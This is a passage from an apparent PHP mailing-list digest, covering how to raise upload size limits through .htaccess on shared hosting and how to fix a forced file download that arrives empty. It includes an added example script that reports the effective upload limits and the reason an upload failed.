> than 8MB, the default size limit set in php.ini. This is on a shared
> server, and my hosting company won't modify the limitation, although they
> will charge me $50/hr to code a custom script. Whatever! I'll just do it
> myself... but I don't know how.
>
> Also, http://docs.php.net/en/function.ini-set.html tells me that for
> post_max_size and upload_max_filesize: "Entry can be set in php.ini,
> .htaccess or httpd.conf."

Some Good News

You can create a file named ".htaccess" in the same directory as your file
upload script, and put this in it:

php_value post_max_size 32M
php_value upload_max_filesize 32M

Use any valid value you like instead of 32M of course.

Yes, there really *should* be a dot (.) at the front of the filename:
.htaccess

Your FTP software and your desktop machine may give you grief about it,
but the web-server *needs* it to be that name.

If you already have an .htaccess file with other stuff in it, which you
may or may not understand, just add the above lines at the bottom.

Their custom script would have to do this exact same thing to make it
work, so there ain't much point to giving them $50/hr for that. :-)

Some Bad News

Your web host *might* have .htaccess turned "off" for performance reasons,
in which case you are screwed.

It's unlikely, but possible.

They ain't gonna turn .htaccess "on" just for you, because then it's "on"
for everybody and slows down the server a little bit.

And they probably won't even change the settings for max_XYZ in httpd.conf
for you, not even for $50. If by some chance they *will* do that, it's a
2-minute job, so don't let them charge you more than $50 for that!

--
Like Music?
http://l-i-e.com/artists.htm
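
To check whether the `.htaccess` override described above actually took effect, and to see which of the two limits rejected an upload, a script can read the effective values and inspect the request. This is an added example, not part of the original post; the form field name `userfile` and the helper function names are assumptions.

```php
<?php
// Added example, not from the original thread.
// Assumption: the upload form uses <input type="file" name="userfile">.

// Convert php.ini shorthand ("32M", "8M", "2G", "1024") to bytes.
function ini_bytes($value) {
    $value  = trim($value);
    $number = (float) $value;
    switch (strtoupper(substr($value, -1))) {
        case 'G': $number *= 1024; // fall through
        case 'M': $number *= 1024; // fall through
        case 'K': $number *= 1024;
    }
    return (int) $number;
}

// Return a description of why the upload failed, or null if it is acceptable.
function upload_problem($server, $files, $field, $post_max, $upload_max) {
    $sent = isset($server['CONTENT_LENGTH']) ? (int) $server['CONTENT_LENGTH'] : 0;
    // A body larger than post_max_size is discarded by PHP: $_POST and $_FILES
    // arrive empty, so this case has to be detected from the request length.
    if ($post_max > 0 && $sent > $post_max) {
        return "request body of $sent bytes exceeds post_max_size ($post_max)";
    }
    if (!isset($files[$field])) {
        return "no file field '$field' in the request";
    }
    switch ($files[$field]['error']) {
        case UPLOAD_ERR_OK:       return null;
        case UPLOAD_ERR_INI_SIZE: return "file exceeds upload_max_filesize ($upload_max)";
        case UPLOAD_ERR_PARTIAL:  return "file was only partially uploaded";
        case UPLOAD_ERR_NO_FILE:  return "no file was sent";
        default:                  return "upload error code " . $files[$field]['error'];
    }
}

$post_max   = ini_bytes(ini_get('post_max_size'));
$upload_max = ini_bytes(ini_get('upload_max_filesize'));
// If these still show the host's defaults, the .htaccess lines were not applied.
echo "post_max_size=$post_max upload_max_filesize=$upload_max\n";

if (isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    $problem = upload_problem($_SERVER, $_FILES, 'userfile', $post_max, $upload_max);
    echo $problem === null ? "upload accepted\n" : "upload rejected: $problem\n";
}
```

Keep `post_max_size` at least as large as `upload_max_filesize`, since the whole request body, file included, counts against `post_max_size`.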

attached mail follows:


I try to download a file with the following code:

    $len = filesize($file);
    $filename = basename($file);
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header("Content-Type: $ctype");
    $header="Content-Disposition: attachment; filename=".$filename.";";
    header($header );
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".$len);
    readfile($file);
    exit;

All works pretty well, the filename is correct, the Content Type and the
file size.
When I try to open the downloaded file I see nothing.
The source file on the web server works great.

I played with Content-Transfer-Encoding and tried all values from the RFC

Any ideas?

thank you

attached mail follows:


Werner Jäger wrote:
> I try to download a file with the following code:
>
> $len = filesize($file);
> $filename = basename($file);
> header("Pragma: public");
> header("Expires: 0");
> header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
> header("Cache-Control: public");

Is it kosher to have two Cache-Control headers?...

More important, do the browsers actually follow the spec if it *IS* kosher.

I'd sure try to get rid of one of these.

> header("Content-Description: File Transfer");
> header("Content-Type: $ctype");

What's $ctype?

It *SHOULD* be "application/octet-stream" if you want to force a download.

> $header="Content-Disposition: attachment; filename=".$filename.";";
> header($header );
> header("Content-Transfer-Encoding: binary");
> header("Content-Length: ".$len);
> readfile($file);
> exit;
>
>
> All works pretty well, the filename is correct, the Content Type and the
> file size.

Is $file a FULL pathname to the file, starting from /, such as:
/usr/home/full/path/to/file.txt

*NOT* just from DocumentRoot or the current directory?
While I would expect filesize and readfile to behave the same, I'd say
*always* use full path for both.

> When I try to open the downloaded file I see nothing.

I'm assuming the file size is not 0, which would mean that technically
everything is working fine, given what you have described :-)

> The source file on the web server works great.

If you want to force a download, use:
header("Content-type: application/octet-stream");

Every browser ever made knows that means "download"

&g